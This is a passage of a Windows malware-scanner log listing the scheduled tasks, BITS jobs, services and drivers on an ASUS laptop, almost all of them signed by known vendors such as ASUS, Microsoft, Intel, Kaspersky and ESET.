O22 - BITS Job: (download) {35B8E922-B052-4E37-A7F9-E8F4EDFD7994} - hxxps://oneclient.sfx.ms/Win/Installers/25.015.0126.0002/amd64/OneDriveSetup.exe -> C:\Users\eymen\AppData\Local\Temp\wct6522.tmp
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe (sign: 'Microsoft')
O22 - Tasks: (damaged) AsusSystemAnalysis_754F3273-0563-4F20-B12F-826510B07474 - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemAnalysis\AsusSystemAnalysis.exe -j0 (user missing) (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical - {613FBA38-A3DF-4AB8-9674-5604984A299A},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical - {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Flighting\FeatureConfig\BootstrapUsageDataReporting - {D759C938-B375-41CB-A2A2-E6D866A767F4} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup - C:\WINDOWS\system32\MdmDiagnosticsTool.exe /clean (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Servicing\OOBEFodSetup - C:\WINDOWS\system32\OOBEFodSetup.exe (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\SharedPC\Account Cleanup - {7750564D-D61C-4557-8A9D-7DF56BDCFF96} - C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\ThemeAssetTask_SyncFODState - {3BC5DD7D-EA3B-428C-B9B6-0723DB6A1057} - C:\Windows\System32\Windows.UI.Immersive.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aemarebackup.dll -f:BackupMareData (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - C:\WINDOWS\system32\sc.exe start InventorySvc (sign: '')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser Exp - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun express (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\SdbinstMergeDbTask - C:\WINDOWS\system32\sdbinst.exe -mm (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Sustainability\SustainabilityTelemetry - {6EE41D75-D091-4FB7-9AD5-018760DD25D4} - C:\WINDOWS\system32\EcoScoreTask.dll (sign: 'Microsoft')
O22 - Tasks: \ASUS\AcPowerNotification - C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: \ASUS\ArmourySocketServer - C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: \ASUS\ASUSUpdateTaskMachineCore1db86dea72d54aa - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe /c (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: \ASUS\ASUSUpdateTaskMachineUA - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe /ua /installsource scheduler (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: \ASUS\Framework Service - C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe --delay (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: \ASUS\P508PowerAgent_sdk - C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ShareFromArmouryIII\Mouse\ROG STRIX CARRY\P508PowerAgent.exe (file missing)
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem135.0.7023.0{74209AC5-BBC1-4D64-A55D-35EC1AD96F77} - C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe --wake --system (sign: 'Google LLC')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 - {84F0FAE1-C27B-4F6F-807B-28CF6F96287D},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 - {429BC048-379E-45E0-80E4-EB1977941B5C},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Diagnosis\UnexpectedCodepath - C:\WINDOWS\system32\UCConfigTask.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\ReconcileConfigs - {15F5ECE1-4550-4A92-8E26-984FD1DA54FA} - C:\WINDOWS\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\UsageDataReceiver - {D4C0420F-76BD-4F66-A91F-918A93ABEBEB} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteMouseSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteMouseSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemotePenSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemotePenSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteTouchpadSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies - {706B965A-8308-4CD4-9900-87C2D79C121B} - C:\Windows\System32\netprofm.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\PerformanceTrace\RequestTrace - {9EFEB182-2EE3-4AF9-AFFA-521410D110D1} - C:\WINDOWS\system32\PerformanceTraceHandler.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\ReFsDedupSvc\Initialization - {DCFF735B-64F7-45F3-B39C-6C66BBE2120F} - C:\WINDOWS\System32\ReFsDedupSvc.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Sustainability\PowerGridForecastTask - {251E5B1F-E370-4E12-B5BD-B7AD2A8EE810} - C:\WINDOWS\system32\PowerGridForecastTask.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\TPM\Tpm-PreAttestationHealthCheck - {5014B7C8-934E-4262-9816-887FA745A6C4},TpmPreAttestationHealthCheck - C:\WINDOWS\system32\TpmTasks.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UIEOrchestrator - C:\WINDOWS\system32\UIEOrchestrator.exe /SendHeartbeat (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker - C:\WINDOWS\system32\MusNotification.exe (file missing)
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UUS Failover Task - C:\WINDOWS\System32\MLEngineStub.exe HandleUusFailoverEvaluationSignalFromWnf (sign: 'Microsoft')
O22 - Tasks: ASUS Optimization 36D18D69AFC3 - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusHotkey.exe -CancelShutdown (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: ASUS Update Checker 2.0 - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSoftwareManager\AsusUpdateChecker.exe (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: AsusSystemAnalysis_754F3273-0563-4F20-B12F-826510B07474 - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemAnalysis\AsusSystemAnalysis.exe -j0 (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky\upgrade_launcher.exe /waitUpgrade (sign: 'AO Kaspersky Lab')
O22 - Tasks: NVIDIA app SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\NVIDIA app\CEF\NVIDIA app.exe (sign: 'NVIDIA Corporation')
O22 - Tasks: PostponeDeviceSetupToast_S-1-5-21-477160831-1423351159-3301466732-1001_0 - {5ded83ef-1e99-48cf-bf83-676d2a6db408},PostponeDeviceSetupToast - C:\Windows\System32\oobe\UserOOBE.dll (file missing)
O22 - Tasks: RtkAudUService64_BG - C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_55047240f73a1fa6\RtkAudUService64.exe -background (sign: 'Realtek Semiconductor Corp.')
O23 - Service R2: Armoury Crate Control Interface - (ArmouryCrateControlInterface) - C:\WINDOWS\System32\ASUSACCI\ArmouryCrateControlInterface.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS App Service - (AsusAppService) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\AsusAppService\AsusAppService.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS AURA SYNC lighting service - (LightingService) - C:\Program Files (x86)\LightingService\LightingService.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: Asus Certificate Service - (AsusCertService) - C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS Optimization - (ASUSOptimization) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusOptimization.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS Software Manager - (ASUSSoftwareManager) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSoftwareManager\AsusSoftwareManager.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS Switch - (ASUSSwitch) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSwitch\AsusSwitch.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS System Analysis - (ASUSSystemAnalysis) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemAnalysis\AsusSystemAnalysis.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS System Diagnosis - (ASUSSystemDiagnosis) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: AsusPTPService - C:\WINDOWS\System32\DriverStore\FileRepository\asusptpfilter.inf_amd64_1e467870260bcd2f\AsusPTPService.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: Dolby DAX API Service - (DolbyDAXAPI) - C:\WINDOWS\System32\DriverStore\FileRepository\dax3_swc_aposvc.inf_amd64_8e54c1bc7d581ad1\DAX3API.exe (sign: 'Dolby Laboratories, Inc.')
O23 - Service R2: ESET Forwarder - (efwd) - C:\Program Files\ESET\ESET Security\efwd.exe (sign: 'ESET, spol. s r.o.')
O23 - Service R2: ESET Service - (ekrn) - C:\Program Files\ESET\ESET Security\ekrn.exe (sign: 'ESET, spol. s r.o.')
O23 - Service R2: GameSDK Service - C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: Intel(R) Audio Service - (IntelAudioService) - C:\WINDOWS\System32\DriverStore\FileRepository\intcoed.inf_amd64_6f0a892deb241071\\AS\\IAS\\IntelAudioService.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Content Protection HDCP Service - (cplspcon) - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_ffe7d9986336312b\IntelCpHDCPSvc.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Dynamic Application Loader Host Interface Service - (jhi_service) - C:\WINDOWS\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe (sign: 'Intel(R) Embedded Subsystems and IP Blocks Group')
O23 - Service R2: Intel(R) Dynamic Tuning Technology Telemetry Service - (dptftcs) - C:\WINDOWS\System32\DriverStore\FileRepository\dtt_sw.inf_amd64_12a05294eb98ea3c\ipfsvc.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Graphics Command Center Service - (igccservice) - C:\WINDOWS\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_a687edda40db3316\OneApp.IGCC.WinService.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Innovation Platform Framework Service - (ipfsvc) - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_15575ddcbffc1fc6\ipf_uf.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Management Engine WMI Provider Registration - (WMIRegistrationService) - C:\WINDOWS\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe (sign: 'Intel Corporation')
O23 - Service R2: Kaspersky Hizmeti 21.20 - (AVP21.20) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\avp.exe -r (sign: 'Kaspersky Lab JSC')
O23 - Service R2: LGHUB Updater Service - (LGHUBUpdaterService) - C:\Program Files\LGHUB\lghub_updater.exe --run-as-service (sign: 'Logitech Inc')
O23 - Service R2: Logitech LampArray Service - (logi_lamparray_service) - C:\WINDOWS\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray_service.exe (sign: 'Logitech Inc')
O23 - Service R2: Malwarebytes Service - (MBAMService) - C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (sign: 'Malwarebytes Inc.') (+safe mode)
O23 - Service R2: Microsoft Defender Core Service - (MDCoreSvc) - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MpDefenderCoreService.exe (sign: 'Microsoft')
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\WINDOWS\System32\DriverStore\FileRepository\nvami.inf_amd64_138dcebfe5992a47\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvami.inf_amd64_138dcebfe5992a47\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem /ert (sign: 'NVIDIA Corporation')
O23 - Service R2: NVIDIA LocalSystem Container - (NvContainerLocalSystem) - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -s NvContainerLocalSystem -a -f "C:\ProgramData\NVIDIA Corporation\NVIDIA app\NvContainer\NvContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem" -r -p 30000 -ert (sign: 'NVIDIA Corporation')
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_55047240f73a1fa6\RtkAudUService64.exe (sign: 'Realtek Semiconductor Corp.')
O23 - Service R2: ROG Live Service - C:\Program Files\ASUS\ROG Live Service\ROGLiveService.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: Thunderbolt(TM) Application Launcher - (TbtHostControllerService) - C:\WINDOWS\ThunderboltService.exe (sign: 'Intel Corporation')
O23 - Service R2: Thunderbolt(TM) Peer to Peer Shortcut - (TbtP2pShortcutService) - C:\WINDOWS\TbtP2pShortcutService.exe (sign: 'Intel Corporation')
O23 - Service R3: ESET Firewall Helper - (ekrnEpfw) - C:\Program Files\ESET\ESET Security\ekrn.exe (sign: 'ESET, spol. s r.o.')
O23 - Service R3: Intel® PROSet/Wireless Service - (PIEServiceNew) - C:\WINDOWS\System32\DriverStore\FileRepository\piecomponent.inf_amd64_ee1169deb7ec6a42\Intel_PIE_Service.exe (sign: 'Intel Corporation')
O23 - Service R3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService (sign: 'Valve Corp.')
O23 - Service S2: ASUS Güncelleme Hizmeti (asus) - (asus) - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe /svc (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service S2: AsusROGLSLService Download ROGLSLoader - (AsusROGLSLService) - C:\Program Files (x86)\ASUS\AsusROGLSLService\AsusROGLSLService.exe -runservice (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service S2: Google Güncelleyici Dahili Hizmeti (GoogleUpdaterInternalService135.0.7023.0) - (GoogleUpdaterInternalService135.0.7023.0) - C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe --system --windows-service --service=update-internal (sign: 'Google LLC')
O23 - Service S2: Google Güncelleyici Hizmeti (GoogleUpdaterService135.0.7023.0) - (GoogleUpdaterService135.0.7023.0) - C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe --system --windows-service --service=update (sign: 'Google LLC')
O23 - Service S2: Intel(R) Platform License Manager Service - C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_fc84dfa25a6a7727\lib\PlatformLicenseManagerService.exe (sign: 'Intel Corporation')
O23 - Service S3: ASUS Güncelleme Hizmeti (asusm) - (asusm) - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe /medsvc (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe (sign: 'BattlEye Innovations e.K.')
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe (sign: 'EasyAntiCheat Oy')
O23 - Service S3: Epic Games Updater - (EpicGamesUpdater) - C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesUpdater.exe (sign: 'Epic Games Inc.')
O23 - Service S3: Epic Online Services - (EpicOnlineServices) - C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe (sign: 'Epic Games Inc.')
O23 - Service S3: Gameforge Client Service - (GameforgeClientService) - C:\Program Files (x86)\GameforgeClient\gfservice.exe (sign: 'Gameforge 4D GmbH')
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\134.0.6998.89\elevation_service.exe (sign: 'Google LLC')
O23 - Service S3: Kaspersky Volume Shadow Copy Service Bridge 21.20 - (klvssbridge64_21.20) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\x64\vssbridge64.exe (sign: 'AO Kaspersky Lab')
O23 - Service S3: MBVpnTunnelService - C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe (sign: 'Malwarebytes Inc.')
O23 - Service S3: NVIDIA FrameView SDK service - (FvSvc) - C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe -service (sign: 'NVIDIA Corporation')
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe (sign: 'Rockstar Games, Inc.')
O23 - Service S3: vgc - C:\Program Files\Riot Vanguard\vgc.exe (sign: 'Riot Games, Inc.')
O23 - Driver R: Antistealth module - C:\Program Files\ESET\ESET Security\Modules\em006_64\1252\em006_64.dll (sign: 'Microsoft' - ESET)
O23 - Driver R: Epfw module - C:\Program Files\ESET\ESET Security\Modules\em008k_64\1641\00\em008k_64.dll (sign: 'Microsoft' - ESET)
O23 - Driver R: HIPS module - C:\Program Files\ESET\ESET Security\Modules\em018k_64\1904\em018k_64.dll (sign: 'Microsoft' - ESET)
O23 - Driver R: Loader module - C:\Program Files\ESET\ESET Security\Modules\em000k_64\1024\em000k_64.dll (sign: 'ESET, spol. s r.o.')
O23 - Driver R: Network protection module - C:\Program Files\ESET\ESET Security\Modules\em042_64\2337\00\em042_64.dll (sign: 'Microsoft' - ESET)
O23 - Driver R0: AO Kaspersky Lab Cryptographic Module x64 (56 bit) - (cm_km) - C:\WINDOWS\system32\DRIVERS\cm_km.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R0: klupd_K4W-21-20_arkmon - C:\WINDOWS\System32\Drivers\klupd_K4W-21-20_arkmon.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R0: klupd_K4W-21-20_klbg - C:\WINDOWS\System32\Drivers\klupd_K4W-21-20_klbg.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Asusgio3 - C:\WINDOWS\system32\drivers\AsIO3.sys (sign: 'ASUSTeK COMPUTER INC.')
O23 - Driver R1: ATKWMIACPI Driver - (ATKWMIACPIIO) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusWmiAcpi.sys (sign: 'ASUSTeK COMPUTER INC.')
O23 - Driver R1: eamonm - C:\WINDOWS\system32\DRIVERS\eamonm.sys (sign: 'ESET, spol. s r.o.')
O23 - Driver R1: ehdrv - C:\WINDOWS\system32\DRIVERS\ehdrv.sys (+safe mode) (sign: 'ESET, spol. s r.o.')
O23 - Driver R1: epfw - C:\WINDOWS\system32\DRIVERS\epfw.sys (+safe mode) (sign: 'ESET, spol. s r.o.')
O23 - Driver R1: epfwwfp - C:\WINDOWS\system32\DRIVERS\epfwwfp.sys (+safe mode) (sign: 'ESET, spol. s r.o.')
O23 - Driver R1: Kaspersky Anti-Virus NDIS 6 Filter - (klim6) - C:\WINDOWS\system32\DRIVERS\klim6.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab Driver.K4W-21-20 - (KLIF.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klif.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab format recognizer driver.K4W-21-20 - (klpd.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klpd.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab Kernel DLL.K4W-21-20 - (klflt.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klflt.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab klbackupdisk.K4W-21-20 - (klbackupdisk.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klbackupdisk.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab klbackupflt.K4W-21-20 - (klbackupflt.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klbackupflt.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab KLKBDFLT.K4W-21-20 - (klkbdflt.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klkbdflt.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab klpnpflt.K4W-21-20 - (klpnpflt.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klpnpflt.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab Security Extender Driver.K4W-21-20 - (klgse.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klgse.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: Kaspersky Lab service driver.K4W-21-20 - (klhk.K4W-21-20) - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klhk.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: kldisk.K4W-21-20 - C:\WINDOWS\system32\DRIVERS\K4W-21-20\kldisk.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: klwtp.K4W-21-20 - C:\WINDOWS\system32\DRIVERS\K4W-21-20\klwtp.sys (+safe mode) (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: kneps.K4W-21-20 - C:\WINDOWS\system32\DRIVERS\K4W-21-20\kneps.sys (sign: 'Microsoft' - AO Kaspersky Lab)
O23 - Driver R1: vgk - C:\Program Files\Riot Vanguard\vgk.sys (sign: 'Riot Games, Inc.')
O23 - Driver R2: MBAMChameleon - (mbamchameleon) - C:\WINDOWS\System32\Drivers\MbamChameleon.sys (sign: 'Microsoft' - Malwarebytes)
O23 - Driver R3: ___ Windows 10 64 Bit için Intel(R) Wireless Bağdaştırıcı Sürücüsü - (Netwtw14) - C:\WINDOWS\System32\DriverStore\FileRepository\netwtw6e.inf_amd64_8231e64986f91750\Netwtw14.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ASUS Precision Touch Service - (AsusPTPDrv) - C:\WINDOWS\System32\DriverStore\FileRepository\asusptpfilter.inf_amd64_1e467870260bcd2f\AsusPTPFilter.sys (sign: 'ASUSTeK COMPUTER INC.')
O23 - Driver R3: AsusSAIO - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemAnalysis\AsusSAIO.sys (sign: 'ASUSTeK COMPUTER INC.')
O23 - Driver R3: Cirrus Amp Driver - (csaudio) - C:\WINDOWS\System32\DriverStore\FileRepository\csaudio.inf_amd64_59f367136e2268c9\csaudio.sys (sign: 'Microsoft' - Windows (R) Win 7 DDK provider)
O23 - Driver R3: igfxn - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_ffe7d9986336312b\igdkmdn64.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) GNA Scoring Accelerator service - (IntelGNA) - C:\WINDOWS\System32\DriverStore\FileRepository\gna.inf_amd64_04d4eecc5838a558\gna.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Management Engine Interface - (MEIx64) - C:\WINDOWS\System32\DriverStore\FileRepository\heci.inf_amd64_6467379f0b0f181f\x64\TeeDriverW10x64.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO GPIO Driver v2 - (iaLPSS2_GPIO2_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_302e75596cffa74a\iaLPSS2_GPIO2_ADL.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO I2C Driver v2 - (iaLPSS2_I2C_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_e736c048ca307ed2\iaLPSS2_I2C_ADL.sys (+safe mode) (sign: 'Intel Corporation')
